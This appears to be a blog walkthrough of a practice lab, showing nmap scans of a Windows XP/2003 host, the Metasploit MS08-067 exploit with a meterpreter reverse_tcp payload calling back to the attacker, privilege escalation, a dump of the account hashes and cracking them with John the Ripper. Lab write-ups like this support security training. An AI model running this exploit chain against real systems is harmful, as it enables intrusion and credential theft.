XP has not been supported in years! A flaw has existed for a large percentage of that unsupported time frame that allows for complete control of the asset.
This XP machine is found at the labs of https://pentest.training. I strongly urge you to log in and have a poke around, especially if your lacking the finances or knowledge to create your own lab.
So we are using OpenVPN to connect to the labs hosted at http://pentest.training. On the network is an XP box. Our mission is to hunt it down and own it. Its possibly the lowest hanging fruit you’ll find in any network and today we will show you why.
Once in the network you’ll find you’re given an IP in the realm of 10.0.100.x. This is only your VPN tunnel as shown in ifconfig. Go back to the OpenVPN connection window you launched
Sat Jan 13 10:18:27 2018 us=654083 /sbin/ip route add 10.0.10.0/24 via 10.0.100.161 Sat Jan 13 10:18:27 2018 us=667003 /sbin/ip route add 10.0.100.1/32 via 10.0.100.161
See how its setting up the routes for you. there is 10.0.10.0/24 available for you. So we should start there. Whilst we could do an nmap discovery scan for all assets, I’m only interested in XP assets. so I’m going to try and enumerate the operating systems of all machines on this subnet:
nmap -O 10.0.10.0/24
Output will display its presumptions on the OS of all devices it scanned/enumerated within the subnet, searching through this list we find a Windows box.
Nmap scan report for 10.0.10.103 Host is up (0.088s latency). Not shown: 992 closed ports PORT STATE SERVICE 21/tcp open ftp 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1027/tcp open IIS 1028/tcp open unknown 3389/tcp open ms-wbt-server No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.60%E=4%D=1/13%OT=21%CT=1%CU=41667%PV=Y%DS=2%DC=I%G=Y%TM=5A59DF7 OS:F%P=x86_64-pc-linux-gnu)SEQ(SP=FD%GCD=2%ISR=10D%TI=I%CI=I%TS=0)SEQ(SP=FD OS:%GCD=1%ISR=10D%TI=I%CI=I%II=I%SS=S%TS=0)OPS(O1=M558NW0NNT00NNS%O2=M558NW OS:0NNT00NNS%O3=M558NW0NNT00%O4=M558NW0NNT00NNS%O5=M558NW0NNT00NNS%O6=M558N OS:NT00NNS)WIN(W1=4000%W2=4000%W3=4000%W4=4000%W5=4000%W6=4000)ECN(R=Y%DF=N OS:%T=80%W=4000%O=M558NW0NNS%CC=N%Q=)T1(R=Y%DF=N%T=80%S=O%A=S+%F=AS%RD=0%Q= OS:)T2(R=Y%DF=N%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=N%T=80%W=4000%S= OS:O%A=S+%F=AS%O=M558NW0NNT00NNS%RD=0%Q=)T4(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O OS:=%RD=0%Q=)T5(R=Y%DF=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=80 OS:%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=N%T=80%W=0%S=Z%A=S+ F=AR%O=%RD=0%Q OS:=)U1(R=Y%DF=N%T=80%IPL=B0%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y% OS:DFI=S%T=80%CD=Z)
We know this is a Windows box due to the ports that are currently open. In a work environment its common to see 135,139 and 445 open for use with file sharing protocols. IIS is another indicator that it is a Microsoft asset. Normally nmap would identify it as XP off the bat, but we now have to dig further to uncover what it is.
Enumerating a little further to confirm what’s running here we use:
nmap -sV 10.0.10.103
Which will give us the “Service Version” of the ports. This gives us a more detailed output:
root@AttackBox:~# nmap -sV 10.0.10.103 Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-13 10:34 GMT Nmap scan report for 10.0.10.103 Host is up (0.098s latency). Not shown: 992 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp Xlight ftpd 3.8 80/tcp open http Microsoft IIS httpd 6.0 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds 1027/tcp open msrpc Microsoft Windows RPC 1028/tcp open msrpc Microsoft Windows RPC 3389/tcp open ms-wbt-server Microsoft Terminal Service Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 62.46 seconds
Now we are pretty sure this is an XP asset (or an extremely poorly configured Windows box). Lets fire up our MetaSploit console using:
Once in we can start to build our attack stagers. We will be using the well known exploit for MS08-067 which has left XP vulnerable and an easy target. We can search for the exploit using:
Now we can prep the attack. Firstly getting the payload set up then configuring the exploit….
msf > use payload/windows/meterpreter/reverse_tcp msf payload(reverse_tcp) > options Module options (payload/windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address LPORT 4444 yes The listen port msf payload(reverse_tcp) > set LHOST 10.0.100.162 LHOST => 10.0.100.162 msf payload(reverse_tcp) > search ms08_067 [!] Module database cache not built yet, using slow search Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption msf payload(reverse_tcp) > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes The SMB service port (TCP) SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(ms08_067_netapi) > set RHOST 10.0.10.103 RHOST => 10.0.10.103 msf exploit(ms08_067_netapi) > exploit [*] Started reverse TCP handler on 10.0.100.162:4444 [*] 10.0.10.103:445 - Automatically detecting the target... [*] 10.0.10.103:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown [*] 10.0.10.103:445 - We could not detect the language pack, defaulting to English [*] 10.0.10.103:445 - Selected Target: Windows 2003 SP2 English (NX) [*] 10.0.10.103:445 - Attempting to trigger the vulnerability... [*] Sending stage (179267 bytes) to 10.0.10.103 [*] Meterpreter session 1 opened (10.0.100.162:4444 -> 10.0.10.103:1165) at 2018-01-13 10:55:46 +0000 meterpreter >
Now we have a meterpreter shell we can raise ourselves to system with no hassles and dump the local hashes. I always use ifconfig/ipconfig on a new system to orientate myself on any new system. Should the system be multi-homed you’ll instantly open up an avenue of attack to scan while you work more on the local box.
meterpreter > ifconfig Interface 1 ============ Name : MS TCP Loopback interface Hardware MAC : 00:00:00:00:00:00 MTU : 1520 IPv4 Address : 127.0.0.1 Interface 65539 ============ Name : Realtek RTL8139 Family PCI Fast Ethernet NIC Hardware MAC : 36:71:58:17:48:d4 MTU : 1500 IPv4 Address : 10.0.10.103 IPv4 Netmask : 255.255.255.0 meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > hashdump Administrator:500:62eda20bfe122e1ffcff707fcab12bbb:655d1f38d5f2d9c44b2d807dccdbf8c7::: ASPNET:1007:b3e5cccfedf674b1af941a4c244b4a37:37eb9ecbe24ce87801f3cc5ed0236e55::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: IUSR_WIN2K3:1003:462782f4bea3ee6fcd93ab145a7a72ed:888efd92ee2f6df097b1c030fe137129::: IWAM_WIN2K3:1004:756461186864d115b2e6f6d1864bce53:bdff2ae5f2a87d3fc1c754b11726f4b6::: ned:1008:7ecf9e1d993c2b3b3180a3e4909c3aaa:9830f413f074ae2a2decf1f2193f170f::: SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:cbdab80c3d45744ed6f1eea41c0ac9fd::: meterpreter >
pro tip about the hashes. The number between the username and the hash…:
- A 500 indicates an administrative account
- and a 501 is a guest account.
Sometimes admins rename guest to admin in order to throw attackers down the wrong path… so keep an eye out for that!
For the sake of shits and giggles since we have the passwords… let slap them through john quickly. Paste them into a file on the desktop creatively called “hashes” and slap them through John
root@AttackBox:~# john --rules=ALL ~/Desktop/hashes Warning: detected hash type "LM", but the string is also recognized as "NT" Use the "--format=NT" option to force loading these as that type instead Warning: detected hash type "LM", but the string is also recognized as "NT-old" Use the "--format=NT-old" option to force loading these as that type instead Using default input encoding: UTF-8 Using default target encoding: CP850 Loaded 12 password hashes with no different salts (LM [DES 128/128 AVX-16]) Remaining 9 password hashes with no different salts Press 'q' or Ctrl-C to abort, almost any other key for status SUMM3RL (ned:1) 1g 0:00:00:32 11.91% 2/3 (ETA: 11:08:01) 0.03090g/s 743177p/s 743177c/s 6246KC/s DOORS*9..@SDFGH Warning: passwords printed above might be partial Use the "--show" option to display all of the cracked passwords reliably Session aborted